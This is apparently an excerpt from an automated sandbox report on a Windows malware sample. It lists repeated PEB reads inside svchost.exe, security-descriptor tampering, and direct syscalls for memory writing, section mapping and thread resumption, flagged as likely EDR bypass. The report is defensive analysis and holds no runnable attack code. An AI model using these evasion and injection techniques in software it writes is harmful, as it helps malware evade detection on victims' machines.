Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]	1_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]	1_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]	1_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]	1_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033644B0 mov ecx, dword ptr fs:[00000030h]	1_2_033644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_033BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033364AB mov eax, dword ptr fs:[00000030h]	1_2_033364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EA49A mov eax, dword ptr fs:[00000030h]	1_2_033EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033304E5 mov ecx, dword ptr fs:[00000030h]	1_2_033304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]	1_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]	1_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]	1_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]	1_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]	1_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]	1_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]	1_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]	1_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]	1_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]	1_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]	1_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]	1_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]	1_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332CB7E mov eax, dword ptr fs:[00000030h]	1_2_0332CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DEB50 mov eax, dword ptr fs:[00000030h]	1_2_033DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]	1_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]	1_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]	1_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]	1_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FAB40 mov eax, dword ptr fs:[00000030h]	1_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D8B42 mov eax, dword ptr fs:[00000030h]	1_2_033D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]	1_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]	1_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]	1_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]	1_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]	1_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335EBFC mov eax, dword ptr fs:[00000030h]	1_2_0335EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_033BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_033DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]	1_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]	1_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]	1_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]	1_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]	1_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]	1_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]	1_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]	1_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336CA24 mov eax, dword ptr fs:[00000030h]	1_2_0336CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335EA2E mov eax, dword ptr fs:[00000030h]	1_2_0335EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BCA11 mov eax, dword ptr fs:[00000030h]	1_2_033BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]	1_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]	1_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]	1_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]	1_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]	1_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DEA60 mov eax, dword ptr fs:[00000030h]	1_2_033DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]	1_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]	1_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]	1_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]	1_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]	1_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]	1_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]	1_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]	1_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]	1_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]	1_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]	1_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03386AA4 mov eax, dword ptr fs:[00000030h]	1_2_03386AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03368A90 mov edx, dword ptr fs:[00000030h]	1_2_03368A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]	1_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]	1_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]	1_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]	1_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]	1_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]	1_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]	1_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]	1_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]	1_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03404A80 mov eax, dword ptr fs:[00000030h]	1_2_03404A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]	1_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]	1_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03330AD0 mov eax, dword ptr fs:[00000030h]	1_2_03330AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]	1_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]	1_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]	1_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]	1_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]	1_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B892A mov eax, dword ptr fs:[00000030h]	1_2_033B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C892B mov eax, dword ptr fs:[00000030h]	1_2_033C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BC912 mov eax, dword ptr fs:[00000030h]	1_2_033BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03328918 mov eax, dword ptr fs:[00000030h]	1_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03328918 mov eax, dword ptr fs:[00000030h]	1_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h]	1_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h]	1_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h]	1_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h]	1_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BC97C mov eax, dword ptr fs:[00000030h]	1_2_033BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]	1_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]	1_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]	1_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0337096E mov eax, dword ptr fs:[00000030h]	1_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0337096E mov edx, dword ptr fs:[00000030h]	1_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0337096E mov eax, dword ptr fs:[00000030h]	1_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B0946 mov eax, dword ptr fs:[00000030h]	1_2_033B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B89B3 mov esi, dword ptr fs:[00000030h]	1_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h]	1_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h]	1_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033309AD mov eax, dword ptr fs:[00000030h]	1_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033309AD mov eax, dword ptr fs:[00000030h]	1_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h]	1_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h]	1_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_033BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033649D0 mov eax, dword ptr fs:[00000030h]	1_2_033649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_033FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C69C0 mov eax, dword ptr fs:[00000030h]	1_2_033C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]	1_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]	1_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]	1_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03352835 mov ecx, dword ptr fs:[00000030h]	1_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]	1_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]	1_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336A830 mov eax, dword ptr fs:[00000030h]	1_2_0336A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D483A mov eax, dword ptr fs:[00000030h]	1_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D483A mov eax, dword ptr fs:[00000030h]	1_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BC810 mov eax, dword ptr fs:[00000030h]	1_2_033BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h]	1_2_033BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h]	1_2_033BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C6870 mov eax, dword ptr fs:[00000030h]	1_2_033C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C6870 mov eax, dword ptr fs:[00000030h]	1_2_033C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03360854 mov eax, dword ptr fs:[00000030h]	1_2_03360854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03334859 mov eax, dword ptr fs:[00000030h]	1_2_03334859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03334859 mov eax, dword ptr fs:[00000030h]	1_2_03334859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03342840 mov ecx, dword ptr fs:[00000030h]	1_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BC89D mov eax, dword ptr fs:[00000030h]	1_2_033BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03330887 mov eax, dword ptr fs:[00000030h]	1_2_03330887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336C8F9 mov eax, dword ptr fs:[00000030h]	1_2_0336C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336C8F9 mov eax, dword ptr fs:[00000030h]	1_2_0336C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FA8E4 mov eax, dword ptr fs:[00000030h]	1_2_033FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E8C0 mov eax, dword ptr fs:[00000030h]	1_2_0335E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335EF28 mov eax, dword ptr fs:[00000030h]	1_2_0335EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03332F12 mov eax, dword ptr fs:[00000030h]	1_2_03332F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03404F68 mov eax, dword ptr fs:[00000030h]	1_2_03404F68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336CF1F mov eax, dword ptr fs:[00000030h]	1_2_0336CF1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E6F00 mov eax, dword ptr fs:[00000030h]	1_2_033E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335AF69 mov eax, dword ptr fs:[00000030h]	1_2_0335AF69

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00B681F7

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B3A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00B3A395
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B3A364 SetUnhandledExceptionFilter,		0_2_00B3A364

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
